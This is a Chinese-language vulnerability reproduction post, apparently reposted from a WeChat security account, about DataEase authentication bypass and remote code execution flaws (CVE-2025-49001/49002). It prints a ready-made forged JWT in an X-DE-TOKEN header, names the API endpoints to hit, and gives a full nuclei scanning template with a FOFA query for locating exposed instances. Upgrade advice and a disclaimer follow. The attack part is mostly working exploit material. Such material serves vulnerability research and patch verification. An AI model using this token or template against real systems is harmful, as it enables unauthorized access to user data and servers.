漏洞介绍
DataEase 是一款开源的数据分析平台,提供丰富的数据可视化和分析功能,帮助用户轻松地进行数据探索和决策支持,CVE-2025-49001 是由于JWT校验机制错误导致攻击者可伪造JWT令牌绕过身份验证流程,CVE-2025-49002 是由于H2数据库模块没有严格过滤用户输入的JDBC连接参数,可使用大小写绕过补丁。攻击者可利用这些漏洞实现未授权代码执行,威胁用户数据和系统的安全。
影响版本
DataEase <= 2.10.8
漏洞复现
CVE-2025-49001
POC:
(这微信页面直接复制代码格式会乱,可以浏览器打开复制)
X-DE-TOKEN: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1aWQiOjEsIm9pZCI6MX0.a5QYOfZDYlhAy-zUMYzKBBvCUs1ogZhjwKV5SBTECt8
可以通过请求以下接口进行验证,无漏洞则会返回500或401
/de2api/license/version
/de2api/user/info
/de2api/login/refresh
漏洞分析
CVE-2025-49001
通过 JWT 解密了 token,获取了 uid 和 oid 的值,并没有使用当前秘钥来验证 token 的合法性,可以使用任意secret来伪造一个符合以下格式的JWT token
{
"uid": 1,
"oid": 1
}
具体分析见原文
https://github.com/dataease/dataease/security/advisories/GHSA-xx2m-gmwg-mf3r
CVE-2025-49002
https://github.com/dataease/dataease/security/advisories/GHSA-999m-jv2p-5h34
nuclei脚本
id: dataease-cve-2025-49001
info:
name: dataease-cve-2025-49001-bypass
author: PokerSec
severity: high
metadata:
fofa-search: title="DataEase"
requests:
- raw:
- |-
GET /de2api/user/info HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/plain, */*
out_auth_platform: default
X-DE-TOKEN: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1aWQiOjEsIm9pZCI6MX0.a5QYOfZDYlhAy-zUMYzKBBvCUs1ogZhjwKV5SBTECt8
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"id":"1"'
- 'oid'
- 'name'
condition: and
- type: status
status:
- 200
修复意见
更新至最新安全版本,目前官方已有可更新版本DataEase >= 2.10.10
官方补丁下载地址:
https://github.com/dataease/dataease/releases/tag/v2.10.10
https://dataease.io/
声明:技术文章均收集于互联网,仅作为本人学习、记录使用。侵权删!!!
原文始发于微信公众号(玄武盾网络技术实验室):【漏洞复现】Dataease JWT 认证绕过漏洞/远程代码执行(CVE-2025-49001/CVE-2025-49002)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论